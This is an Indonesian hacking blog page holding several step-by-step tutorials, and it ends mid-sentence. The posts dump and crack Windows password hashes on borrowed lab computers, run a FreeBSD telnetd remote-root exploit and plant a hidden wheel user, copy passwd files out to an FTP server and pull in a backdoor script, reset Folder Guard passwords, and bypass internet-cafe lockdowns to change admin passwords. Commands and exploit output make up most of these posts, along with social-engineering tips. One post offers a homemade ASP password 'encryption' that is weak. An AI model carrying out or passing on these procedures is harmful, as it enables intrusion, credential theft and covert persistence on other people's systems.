Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Selasa, 29 Desember 2009

Hack Windows XP (SP2) Passwords

Apakah anda pernah menggunakan komputer di Lab atau pinjam komputer teman atau bahkan menggunakan komputer di tempat umum? Nah, biasanya klo di Lab (berdasarkan pengalaman pribadi) komputer pasti di-password dan jika ingin masuk harus tanya dulu ke sang empunya. Nah, sekarang kita dapat melihat password dari komputer yang kita gunakan tanpa merestart komputer atau pun tanpa menginstall program apapun seperti Cain, L0pthCrack, dsb. Hanya dibutuhkan sedikit ‘kepercayaan’ untuk meminjam komputer (istilah kerennya social engineering) dan 2 buah program, yaitu pwdump6 dan john the ripper. Tapi klo kebetulan ada login umum dengan tipe administrator, itu namanya Hoki! ga perlu cape2 pinjam login teman lagi


Sebelumnya mungkin anda pernah mendapatkan tutorial mengenai cara menge-hack password user yang ada Windows XP atau NT menggunakan pwdump. Yup, mungkin tutorial ini akan mirip dengan bagaimana cara menge-hack Windows XP, terutama Windows XP SP2. Lalu apa bedanya dengan tutorial yang lain? Saat ini Windows XP SP2 (atau mungkin juga SP1, CMIIW), menggunakan Syskey untuk memproteksi agar HASH (tempat menyimpan password yang dienkripsi) tidak dapat dibaca dan didump menggunakan pwdump atau samdump. Untuk lebih jelasnya berikut penjelasan mengenai Syskey [1] :

Syskey is a Windows feature that adds an additional encryption layer to the password hashes stored in the SAM database. The main purpose of this feature is to deter ‘offline’ attack. In fact one of the most common ways to gather passwords is to copy the system SAM database and then use one of the many good password crackers to “recover” the passwords; of course physical access is almost always required. So with syskey the attacker needs to remove the additional encryption layer to get the password hashes.

Jika dulu mungkin di Windows NT atau XP (sebelum SP2), kita masih bisa menggunakan pwdump atau bahkan langsung dengan KaHT, maka untuk Windows XP SP2 cara tersebut tidak dapat digunakan lagi (mungkin lebih tepatnya, pwdump tersebut tidak dapat digunakan lagi). Nah disinilah letak perbedaan dengan tutorial sebelumnya. Jika sebelumnya kita menggunakan pwdump versi lama, maka sekarang digunakan pwdump6 yang dikembangkan oleh fizzgig and the foofus.net Team. Kalau baca README dari pwdump6 ini, maka pwdump6 adalah :

pwdump6 is a password hash dumper for Windows 2000 and later systems. It is capable of dumping LanMan and NTLM hashes as well as password hash histories. It is based on pwdump3e, and should be stable on XP SP2 and 2K3. If you have had LSASS crash on you using older tools, this should fix that.

A significantly modified version of pwdump3e, this program is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is turned on. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file

Oh iya, agar pwdumpd6 dapat dijalankan dan mendapatkan HASH file dibutuhkan account yang mempunyai akses setara dengan Administrator. Nah, oleh karena itu kita harus menjalankan sedikit social engineering. Bilang aja ketemen kita, klo mengakses workgroup, tapi ga bisa klo pake login biasa. Tapi tenang aja, biasanya secara default orang-orang kebanyakan mebuat user dengan tipe account Administrator. Atau gunakan berbagai macam cara, daya, upaya maupun rayuan agar kita bisa dapat login terlebih dulu.

Jika udah punya akses dengan login tipe adiministrator, cara selanjutnya adalah tinggal menjalankan pwdump6. Jika anda punya flashdisk, simpan dan bawa terus pwdump6 ini kemanapun ada pergi, siapa tahu berguna suatu saat.. :-D. Ok, langsung aja kita jalankan pwdump6 ini. Sebaiknya copy dulu pwdump6 ke Hardisk (jangan dijalankan dari flashdik). Sebelumnya downlod dulu pwdump6 ini dari sini atau download dari mirror situs saya disini.

1. Jalankan CMD (Run->cmd)

2. Jalankan pwdump6 seperti berikut (misalnya PwDump6 berada di folder D:\PwDump6)

D:\PwDump6>PwDump.exe -o pass.txt 127.0.0.1

pwdump6 Version 1.3.0 by fizzgig and the mighty group at foofus.net
Copyright 2006 foofus.net

This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.

Using pipe {C411BDE9-594E-47F4-99B5-E94ADF194A45}
Key length is 16
Completed.

3. Setelah itu akan didapatkan file pass.txt yang berisi daftar user dan password yang masih dienkripsi. Contohnya akan tampak seperti berikut :

ach:1003:2BFA42D08601B951ABD697149E2F5967:73098347042E9109FA584CE843018F4F:::
Administrator:500:934A4750EC9859B3EA397B0F6EC18E34:732BD09D6834DA4A5A30300A6A045BF8:::
coba:1004:FBE4F28EE205F0BA79999C25263AA9AA:A69C199A4DF77CD41FCA6EA916A93868:::
Guest:501:NO PASSWORD********************* :NO PASSWORD*********************:::
HelpAssistant:1000:B3D2AE56C93F27B43C4F8419B1A21E9B: DC3DBB258A10B0C7EA9D92133267B905:::
SUPPORT_388945a0:1002:NO PASSWORD*********************: DF1DB672DA1B5C045ECA2490CA753D3B:::

4. Yosh!! password sudah ditangan. Proses selanjutnya adalah menge-crack file pass.txt dengan bantuan John The Ripper. Sebaiknya simpan dulu file pass.txt ke USB atau upload ke tempat yang aman, karena proses cracking ini bisa dilakukan kapan saja dan dimana saja. Berdasarkan pengalaman, kalau passwordnya tidak terlalu sulit ditebak seperti “adminkeren”, “qwerty123″, biasanya dibutuhkan waktu yang tidak terlalu lama untuk mengecracknya lewat John The Ripper. Tapi kalau password menggunakan kombinasi yang aneh-aneh seperti “P4ssW0rD”, “S03S4h”, dsb, biasanya membutuhkan waktu lama, bisa ditinggal tidur atau maen aja dulu. Ok, sekarang gini nih cara ngecraknya.

Download John The Ripper untuk Windows disini. Untuk komputer yang menggunakan Prosesor AMD, sebaiknya menggunakan “john-mmx.exe”. Atau bagi yang menggunakan intel atau AMD, dapat menggunakan “John-386.exe”. Sebelumnya copy file pass.txt ke dalam folder tempat “John-mmx.exe” atau “John-386.exe” berada (John171w\john1701\run). Setelah itu tinggal jalankan perintah berikut dan tunggu dengan sabar :

D:\john171w\john1701\run>john-mmx.exe pass.txt
Loaded 8 password hashes with no different salts (NT LM DES [64/64 BS MMX])
REN123 (Administrator:2)
TEBAK (coba:2)
ADMINKE (Administrator:1)
MUDAHDI (coba:1)

Yosh!! sekarang passwordnya sudah terlihat secara kasat mata. Jadi password untuk user “Administrator” adalah “adminkeren123″, diperoleh dari menggabungkan Administrator:2 dan Administrator:2.

Administrator:1+Administrator:2 = adminkeren123

Sedangkan untuk user “coba” adalah “mudahditebak”!!

Mudah bukan? Intinya sih tinggal ambil HASH file (password yang dienkripsi) menggunakan pwdump6 lalu crack hasilnya dengan John The Ripper.

Nah, sekarang kalau kita mau pakai komputer teman di Lab, ga usah cari2 orangnnya lagi. Tinggal pake aja langsung user Admin lagi, tapi jangan sampai ketahuan ama dia….. Atau klo anda lupa password Administrator, tidak perlu mereboot komputer, lalu mereset password anda. Tinggal ikut langkah2 diatas aja!


Read More..

Sabtu, 08 Agustus 2009

Login ke FreeBSD secara Siluman

Viva buat script kiddies, karena saya bukan hacker :P~, melainkan lamerz, pertama-tama jelas anda harus punya shell buat anda jadikan modal ngeroot server FreeBSD tersebut, terserah anda akan menggunakan exploits apa, yang jelas anda pasti lebih mengerti dari pada saya, saya kasih contoh pake remote exploit menggunakan telnetd 7350854.c

Ex :
[lee@linux .lee]$ ./bsd target.com

7350854 - x86/bsd telnetd remote root
by zip, lorian, smiler and scut.

check: PASSED, using 16mb mode

######################################

ok baby, times are rough, we send 16mb traffic to the remote telnet daemon process, it will spill badly. but then,
there is no other way, sorry...



## setting populators to populate heap address space
## number of setenvs (dots / network): 31500
## number of walks (percentage / cpu): 496140750
##
## the percentage is more realistic than the dots ;)

percent |-----------------------------------| ETA |
19.19% |......................... | 00:49:32 |

oke kita tunggu sampe dapet root

## sleeping for 10 seconds to let the process recover
## ok, you should now have a root shell
## as always, after hard times, there is a reward...


command: ÿý%id;uname -a;whoami
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 31(guest)
FreeBSD target.com 4.2-RELEASE FreeBSD 4.2-RELEASE #1: Sat Nov 25 10:13:58 CST 2000 root@target.com:/usr/src/sys/compile/MAIL i386
root

!LOL anda bisa tertawa girang anda sudah mendapatkan Root, sekarang anda siapkan jurus buat mengamankan shell FreeBSD baru anda ini, dan anda add user dulu.

/usr/sbin/pw adduser gue -g wheel -s /bin/tcsh -d /etc/.gue

Terus bikin home buat anda di shell nya

mkdir /etc/.gue

terus sekolahin tuh shell biar bisa baca tulis

/usr/sbin/chown gue.wheel -R /etc/.gue
chown: -R: No such file or directory

Wekz.!!! kok no such file , cuekin aja namanya juga lamerz sekarang kita bikin pass nya dulu

passwd gue
New password:gue1234

Retype new password:gue1234

passwd: updating the database...
passwd: done
Changing local password for gue.

okbaybeh !! sekarang anda telnet ke shell freebsd baru anda itu

FreeBSD/i386 (target.com) (ttyp3)

login: gue
Password:*****

Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.

FreeBSD 4.2-RELEASE (MAIL) #1: Sat Nov 25 10:13:58 CST 2000

Welcome to FreeBSD!

Before seeking technical support, please use the following resources:

o Security advisories and updated errata information for all releases are at http://www.FreeBSD.org/releases/ - always consult the ERRATA section for your release first as it's updated frequently.

o The Handbook and FAQ documents are at http://www.freebsd.org/ and, along with the mailing lists, can be searched by going to http://www.FreeBSD.org/search.html. If the doc distribution has been installed, they're also available formatted in /usr/share/doc.

If you still have a question or problem, please take the output of `uname -a', along with any relevant error messages, and email it as a question to the questions@FreeBSD.org mailing list. If you are unfamiliar with FreeBSD's directory layout, please refer to the hier(7) man page. If you are not familiar with man pages, type "man man".
You may also use `/stand/sysinstall' to re-enter the installation and configuration utility. Edit /etc/motd to change this login announcement.

>

nahh sekarang kita racik bumbunya, kita balik ke root tadi, kita liat file master.passwd sama passwd,

cat /etc/master.passwd
s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566: 1040::0: 0: teacher part-time: /home/professor/ACCT/ mhw:/usr/local/util/msman
gue:$1$MDoybd3Y$OBWMzMHYU8WJkRAU8hSP00: 6925:0::0:0: User &:/etc/.pupet:/bin/tcsh

ada entry baru di file tersebut, hemm admin bisa curiga neh, kita liat juga di file passwd

cat /etc/passwd
syscpa:*:1564:1040:teachers part-time 20020506:/home/professor/ACCT/syscpa:/usr/local/util/msman
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:*:6925:0:User &:/etc/.pupet:/bin/tcsh

fiiiuuuhhh ada juga, okies santee, kita ke folder /etc

cd /etc

hemm jadi gimana donkz ?... ya udah kita buka ftp, ( pake ftp account anda dimanahlah terserah anda )

ftp
open uhamka-student.net
uhamka-student.net <-= masukin login
Password:***** <-= masukin password

udah gitu loe kirim file master.passwd sama file passwd ke ftp account loe

put master.passwd

abis itu file passwd

put passwd

setelah itu anda ambil / DL file master.passwd sama file passwd tadi dari ftp anda tadi, terus anda edit, setelah itu anda buka master.passwd menggunakan notepad.

s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566:1040::0:0:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:$1$MDoybd3Y$OBWMzMHYU8WJkRAU8hSP00:6925: 0::0:0: User &:/etc/.pupet:/bin/tcsh <=-- ini anda hapus

jadi tinggal :

s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566: 1040::0:0: teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman

terus file tersebut anda save

setelah itu anda buka satu file lagi passwd, sama seperti tadi anda hapus "entry" yang baru aja anda buat pass add user

s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:*:6925:0:User &:/etc/.pupet:/bin/tcsh <-= loe hapus juga ini

jadi

s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman

setelah itu anda save

file master.passwd sama passwd di ftp account anda, anda hapus dan file master.passwd sama passwd yang sudah anda edit anda upload ke ftp account anda lagi, setelah itu anda hapus file asli yang anda root tadi

rm master.passwd
rm passwd

anda ganti sama file master.passwd dan passwd yang sudah anda edit dan sudah anda upload ke ftp account anda, terus anda kirim lagi master.passwd sama passwd hasil editan anda ke shell tadi

kita liat hasilnya

cat /etc/passwd
syscpa:*:1564:1040:teachers part-time 20020506:/home/professor/ACCT/syscpa:/usr/local/util/msman
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman

upsss !! dah tidak ada, terus hilang dong account baru kita, hemmmz tidaklah kawan, coba anda telnet lagi pake user sama pass yang tadi anda buat, kita test

FreeBSD/i386 (target.com) (ttyp4)
login: gue
Password:
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.

PUPET and AxAL At #cracxer IRC.DAl.net Welcome Guys Sorry for the admin <-= file motd-nya saya ganti


Fiuuuh masih bisa masuk, khan sudah di hapus ?? <-= jangan tanya saya, be 'coz saya khan cuma lamers, hehehehe, trus anda puas dengan hasil anda ini ngak khan..??, anda pasti ingin mendapetkan akses root, gampang saja anda tinggal cari local exploit untuk mendapatkan akses root, oke sekarang kita ambil script nya, jangan lupa root box anda tutup saja,dan anda menggunakan account baru, terus anda ambil scriptnya yang sudah anda siapkan di ftp account anda

ftp> open uhamka-student.net
Connected to uhamka-student.net.
220 ProFTPD 1.2.4 Server (AEI Web Sites) [216.52.166.48]
Name (uhamka-student.net:pupet): uhamka-student.net
331 Password required for uhamka-student.net.
Password:******
230 User uhamka-student.net logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get evelyne.sh
local: evelyne.sh remote: evelyne.sh
227 Entering Passive Mode (211,101,151,167,121,20)
150 Opening ASCII mode data connection for evelyne.sh (1023 bytes).
100% 1055 00:00 ETA
226 Transfer complete.
1055 bytes received in 1.00 seconds (1.03 KB/s)
ftp> bye

kalau sudah anda ambil scriptnya, anda racik deh, caranya:

mv evelyne.sh su

ganti chmod nya

chmod +x su

anda jalankan scriptnya

>./su
Please hit ctrl-c twice...

nah anda tekan CTRL + c ( 2 kali )

now login with user eric and password FLUE A COOK HOVE DOUR SKY
after you're logged in you can su to root with the same
password

Trying ::1...
Connected to localhost.
Escape character is '^]'.

FreeBSD/i386 (target.com) (ttyp4)
login:eric
pass :FLUE A COOK HOVE DOUR SKY

Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.

PUPET and AxAL At #cracxer IRC.DAl.net Welcome Guys Sorry for the admin
>su
s/key 97 de09623
Password:FLUE A COOK HOVE DOUR SKY
#id
uid=0(root) gid=0(root) groups=0(root), 2(kmem), 3(sys), 4(tty), 5(operator), 31(guest)
>
Nah asik khan, sekali lagi hidup lamerz and script kiddies, thanks to all my friend at #cracxer Irc.dal.net , #cracxer will be back, thanks sekali lagi buat AXAl yang dah mau ngasih opini dan nemenin saya bikin artikel ini, juga buat petualang, kaka-joe, pak-tani, notts, babah, maffias yang Lagi bobo, ERNESTO_CHE_GUEVARRA (temen buat ke dugem) heueheu VIVA #CRACXER

Daftar exploit.

bisa anda dapatkan di www.packetstormsecurity.org, www.neworder.box.sk

Tutor ini saya rasa masih banyak "kekurangan" dan perlu pembenahan lebih dalam dari para Sang Ahli, karena sekali lagi saya cuma seorang lamerz dan sangat lamerz

-Sebelumnya Terima kasih atas kritik dan sarannya dan untuk "Jasakom.com" yang sudah mempublikasikan Artikel dari "si L@mers ini" viva jasako
Read More..

Menjebol Password FOLDER GUARD Pro 5.2

Keamanan memang sangat penting melihat perkembangan teknologi informasi yang demikian pesat sekarang ini, namun teknologi kejahatan saat ini masih lebih unggul satu tingkat dibanding dengan pencegahannya. Tapi itu tidak menjadi landasan untuk kita bisa terus mengikuti perkembangan Teknologi security yang mungkin akan lebih maju.

Mungkin Anda pernah mendengar salah satu tools proteksi berbasis windows yang sangat terkenal yaitu FOLDER GUARD, versi terbarunya FOLDER GUARD PRO 5.3, untuk FOLDER GUARD PRO 5.2 bisa Anda cari di www.google.com, & dan cracknya di http://paulyoung.yeah.net.


Software ini memang dibilang sangat handal dibanding dengan software proteksi lainya , karena bisa menghiddenkan subkey yang berhubungan dengan system folder guard tersebut, sehingga akan membuat kita kesulitan untuk melihat sejauh mana sistem tersebut. Tapi perlu diketahui banyak software proteksi yang memberikan fitur-fitur praktis, sehingga akan memudahkan penggunanya dan akan mengundang adanya hole pada software itu sendiri, Contohnya FOLDER GUARD PRO 5.2.

Sewaktu kita instalasi software ini, kita akan diminta untuk mengeset apa yang perlu diproteksi, apakah folder atau sistem, baru kita akan diminta untuk memasukan password Administrator dan Master dan setelah itu di save.

Password Administrator berfungsi untuk kita menjalankan folder Guard, sedangkan password Master berfungsi untuk menjalankan Toggle protection sehingga proteksi proteksi folder guard bisa dibikin enabled atau disabled secara cepat tanpa perlu konfigurasi.

Nah biasanya setelah kita instalasi folder guard dia akan membuat folder di directory windows\desktop\Folder Guard. Mungkin Anda sudah nggak sabar denger ocehan saya. Sekarang coba anda klik file Reset password yang ada di \windows\desktop\Folder Guard. Setelah itu Anda akan diminta Mengisi form registrasi pertama kalian, sebelumnya saya ingatkan anda diminta mencari dulu crack buat folder guard pro 5.2 setelah itu isi form registrasi harus sama dengan yang anda isi sewaktu instalasi pertama. Nah dengan cara tersebut diatas kita akan masuk ke folder guard tanpa password.
Â

Â
Tapi yang menjadi masalah jika posisi kita diwarnet atau di kantor yang menggunakan software folder guard , tentunya kita masukin username serta registrasi code kita dg menggunakan software Cracking folder guard pro 5.2, hal itu tidak akan berhasil Karena dia akan meminta user name registrasi serta codenya sewaktu install pertama bukan registrasi code yang baru.


Sekarang bagaimana kalau di warnet atau kantor mudah saja, coba Anda copykan file Fgkey.exe, Fguard32.dll, Fguard.vxd dari komputer Anda yang ada didirektory \Program Files\WinAbility\Folder Guard\ kedalam disket, kalau sudah klik tombol start trus run, ketik regedit kalau regedit dikunci Anda import aja file .reg yang berisikan disabled registry tools dari disket Anda lalu klik kanan, kalau sudah masuk ke subkey \HKEY_LOCAL_MACHINE\Software\Winability\Folder Guard\Setup\1, setelah itu delete key yang name valuenya info.


Sekarang buat shortcut untuk file fgkey.exe yang ada di drive A, trus tambahkan options / pw,pada command line “A:\fgkey” /pw , isi nama shortcutnya dengan reset.

Â

lalu kalian klik shortcut reset tersebut kemudian klik continue pada form registrasi, jika keluar message “The Administrator's Password For Folder Guard has been reset” berarti Selamat anda telah berhasil menembus password administrator folder guard pro 5.2. Perlu diketahui cara ini juga sudah saya coba pada Folder Guard pro 5.3 yang terbaru dan berhasil, sekarang coba jalankan program folder guardnya, kalian masuk tanpa password setelah itu kalian bisa rubah setting proteksinya sekaligus mengganti passwordnya eh nggak boleh jahat. Artikel ini saya buat untuk tujuan security, sehingga para pemilik warnet bisa lebih hati-hati & waspada dalam hal proteksi sistem.


Read More..

Pemrograman ASP untuk Mengenkripsi Password

Seringkali dalam situs ada fitur login username dan password atau login khusus administrator, untuk dapat mengakses dan menggunakan berbagai fitur yang disimpan dalam database(umumnya SQL atau Access)

Namun, bagaimana jika seorang attacker mendapatkan table user dan semua password user? Ini malapetaka. Tentunya anda ingin menyembunyikan atau mengenkripsi password dalam tabel user. Berikut ini saya berikan VBscript yang dikombinasikan dengan script ASP.
untuk mengenkripsi password user. Terlebih dahulu kita membuat sebuah fungsi yang kita perintahkan untuk mengenkripsi password ke dalam karakter ASCII. Fungsi ini kita namakan fungsi enkripsi. Berikut ini adalah VBscript yang akan kita gunakan.



Function enkripsi(x1, x2)
   s = ""
   t = 0
   For i = 1 to len(x1)
       t = t + asc(mid(x1,i,1))
   Next
   For i = 1 to len(x2)
       y = (t + asc(mid(x2,i,1)) * asc(mid(x2,((i+1) mod len(x2)+1),1))) mod 255
       s = s & chr(y)
   Next
   For i = (len(x2) + 1) to 10
       If t>598.8 Then t = 598.8
       y = t^3*i mod 255
       s = s & chr(y)
   Next
   enkripsi = s
End Function

VBscript ini akan kita gunakan dalam file bernama enkripsi.asp. Lihat contohnya dibawah ini:

<%
Function enkripsi(x1, x2)
   s = ""
   t = 0
   For i = 1 to len(x1)
       t = t + asc(mid(x1,i,1))
   Next
   For i = 1 to len(x2)
       y = (t + asc(mid(x2,i,1)) * asc(mid(x2,((i+1) mod len(x2)+1),1))) mod 255
       s = s & chr(y)
   Next
   For i = (len(x2) + 1) to 10
       If t>598.8 Then t = 598.8
       y = t^3*i mod 255
       s = s & chr(y)
   Next
   enkripsi = s
End Function
%>



 Enkripsi <br /> <br /><body> <br /><% If request.form("name") = "" Then %> <br />Username: <br /> <br />Password: <br /> <br /> <br /><% Else %> <br /><% response.write enkripsi(request.form("name"),request.form("pass")) %> <br /><% End If %> <br /> <br />CATATAN: <br /> <br />Anda dapat mengubah kode berikut sesuai dengan konfigurasi situs anda <br /> <br />misalnya menjadi seperti ini: <br /> <br /> <br />Fungsi ini tidak dapat dibalik, maksudnya jika user lupa password, maka harus diberikan password baru. Tapi kita tidak membahas masalah fitur ini. Disini saya hanya menerangkan metode enkripsi password melalui pemrograman ASP. <br /> Meskipun script ini bukan enkripsi tingkat tinggi, tapi cukup efektif dalam mengelabui hacker-hacker kelas teri (sorry kagak bermaksud menghina, tapi iya khan? hehe). Untuk yang hacker kelas berat, kita memerlukan area secure yang terenkripsi, seperti https:// <br /> <br /></span> <a href='http://trycahgo.blogspot.com/2009/08/pemrograman-asp-untuk-mengenkripsi.html'>Read More..</a> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Diposting oleh <span class='fn'>try</span> </span> <span class='post-timestamp'> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Label: <a href='http://trycahgo.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post hentry uncustomized-post-template'> <a name='4198944864243391658'></a> <h3 class='post-title entry-title'> <a href='http://trycahgo.blogspot.com/2009/08/trik-jitu-ampuh-menghadapi-billing.html'>TRIK JITU AMPUH MENGHADAPI BILLING EXPLORER YANG MEMATIKAN AKSES BILA SEDANG BERINTERNET</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> Sebelumnya saya ucapkan banyak terima kasih buat Jasakom community. Terimakasih buat para hacker mania and cracker mania yang dulu sudah mengajari aku banyak hal, maka ijinkan saya mereview your coretan kembali. Sering kita ke warnet yang banyak mengunci berbagai akses seperti windows explorer tidak bisa dibuka, klik kanan di desktop tidak bisa, klik kanan di folderpun tidak bisa...betapa sedihnyakan... apalagi bagi saya yang telah terbiasa dengan shortcut windows xp, misalnya membuka windows explorer: <br />Win +E, membuka run: Win +R, mencari file di dalam harddisk Win +F, yang mana tombol Win terletak antara <br />tombol Ctrl dan tombol alt. ingin tahu caranya...nih silakan coba... <br />Sebenarnya cara ini telah lama saya coba dan ternyata berhasil (praktek di komputer sendiri dan beberapa warnet yang menggunakan billing explorer) Mohon maaf kepada pembuat Billing Explorer...untuk tidak berpanjang lebar langsung aja ya... <br /><br /><span class="fullpost"><br />Pertama Buka GPEdit.msc dulu <br />caranya: <br />C:\Windows\System32\GPEdit.msc <-- double Click <br />1. Jika Klik Kanan di Desktop tidak bisa <br />Masuk Ke GPEdit.msc <br />Masuk ke [User Configuration/Administrative Templates/Desktop] <br />- Disable (Hide and disable all items on the desktop) <br />Jika MyComputer tidak ada <br />- Disable (Remove My Computer icon on the Desktop) <br />2. Jika Ingin mengubah properties pada taskbar start menu <br />masuk ke [User Configuration/Administrative Templates/Start Menu and Taskbar] <br />- Disable (Prevent changes to Taskbar and Start Menu Settings) <br />Jika Menu Run tidak muncul <br />- Disable (Remove Run menu from Start Menu) <br />Jika menu pada taskbar saat klik kanan tidak muncul <br />- Disable (Remove access to the context menus for the taskbar) <br />3. Apabila Control Panel tidak bisa di akses <br />Masuk ke [User Configuration/Administrative Templates/Control Panel] <br />- Disable (Prohibit access to the Control Panel) <br />4. Jika Command Prompt tidak bisa di akses <br />Masuk ke [User Configuration/Administrative Templates/System] <br />- Disable (Prevent access to the command prompt) <br />Jika Registry Editor tidak bisa di akses <br />- Disable (Prevent access to registry editing tools) <br />5. Jika Task Manager tidak bisa di akses <br />Masuk ke [User Configuration/Administrative Templates/System/Ctrl+Alt+Del Options] <br />- Disable (Remove Task Manager) <br />6. Jika Folder Options pada Windows Explorer tidak muncul <br />Masuk ke [User Configuration/Administrative Templates/Windows Component/Windows Explorer] <br />- Disable (Remove these Folder Options menu item from the Tools menu) <br />Jika Windows Key tidak berfungsi <br />- Disable (Turn off Windows+X hotkeys) <br />------------------------------------------- end -------------------------------------------- <br />--------------------------------------- Regedit. --------------------------------------- <br />==> Setelah GPEdit.msc terbuka baru buka Registry Tools <br />caranya: <br />C:\Windows\System32\regedit.exe <-- double Click <br />--- atau --- <br />C:\Windows\regedit.exe <-- double Click <br />------------------------------------------ start. ------------------------------------------ <br />Regedit 4 <br /><br />[HKEY_LOCAL_MACHINE\Software\ResearchMachines\NOATTRIB.VXD] <br />"loadvxd"=dword:00000000 <br /><br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] <br />"NoDrives"=dword:00000000 <br />"LinkResolveIgnoreLinkInfo"=dword:00000000 <br />"NoFolderOptions"=dword:00000000 <br />"ClearRecentDocsOnExit"=dword:00000000 <br />"NoTrayContextMenu"=dword:00000000 <br />"EnforceShellExtensionSecurity"=dword:00000000 <br />"NoPrinterTabs"=dword:00000000 <br />"NoDeletePrinter"=dword:00000000 <br />"NoAddPrinter"=dword:00000000 <br />"NoRun"=dword:00000000 <br />"NoSetFolders"=dword:00000000 <br />"NoSetTaskbar"=dword:00000000 <br />"NoClose"=dword:00000000 <br />"NoViewContextMenu"=dword:00000000 <br /><br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] <br />"DisableRegistryTools"=dword:00000000 <br />"NoDispScrSavPage"=dword:00000000 <br />"NoDispAppearancePage"=dword:00000000 <br />"NoDispSettingsPage"=dword:00000000 <br />"NoAdminPage"=dword:00000000 <br />"NoProfilePage"=dword:00000000 <br />"NoDevMgrPage"=dword:00000000 <br />"NoConfigPage"=dword:0000000 <br />"NoFileSysPage"=dword:00000000 <br />"NoDispCPL"=dword:00000000 <br />"NoDispBackgroundPage"=dword:00000000 <br />"NoVirtMemPage"=dword:00000000 <br /><br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network] <br />"NoFileSharingControl"=dword:00000000 <br />"NoPrintSharingControl"=dword:00000000 <br />"NoNetSetup"=dword:00000000 <br />"NoNetSetupIDPage"=dword:00000000 <br />"NoNetSetupSecurityPage"=dword:00000000 <br />"NoEntireNetwork"=dword:00000000 <br />"NoWorkgroupContents"=dword:00000000 <br /><br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp] <br />"NoRealMode"=dword:00000000 <br />"Disable"=dword:00000000 <br /><br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop] <br />"NoHTMLWallPaper"=dword:00000000 <br />"NoChangingWallPaper"=dword:00000000 <br />"NoCloseDragDropBands"=dword:00000000 <br />"NoMovingBands"=dword:00000000 <br />"NoAddingComponents"=dword:00000000 <br />"NoDeletingComponents"=dword:00000000 <br />"NoEditingComponents"=dword:00000000 <br />"NoClosingComponents"=dword:00000000 <br /><br />[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] <br />"NoFolderOptions"=dword:00000000 <br /><br />[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System] <br />"DisableCMD"=dword:00000000 <br />"DisableRegistryTools"=dword:00000000 <br /><br />[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Advanced] <br />"Hidden"=dword:00000000 <br />"HideFileExt"=dword:00000000 <br />"ShowSuperHidden"=dword:00000000 <br />------------------------------------------- end -------------------------------------------- <br />==> Setelah regedit.exe terbuka baru ubah password administrator <-- (Ini yang di tunggu2x) <br />caranya: <br />C:\Windows\System32\compmgmt.msc <-- double Click <br />------------------------------------------ start. ------------------------------------------ <br />Pilih: - Computer Management (Local)/System Tools/Local Users and Groups/User <br />- Klik kanan Administrator -> Set Password <br />- Ketik New Password: ********** <br />Confirm Password: ********** <br /><br />--------------------------------------- Bonus - Bonus --------------------------------------- <br />Jika tidak bisa sama sekali klik kanan di Windows Explorer masih ada trik tertentu <br />caranya: <br />- Masuk ke Folder misalnya: C:/Windows/System32 <br />- Trus klik salah satu file dalam folder itu <br />misalnya: TaskMgr.exe <br />- Kemudian klik menu File pada Win Explorer <br />- Run as... <br />- Klik The following user -> Masukkan passwordnya <br />Username: Administrator <br />Password: ******** <br />- Selesai <br />NB: Cara ini dilakukan jika 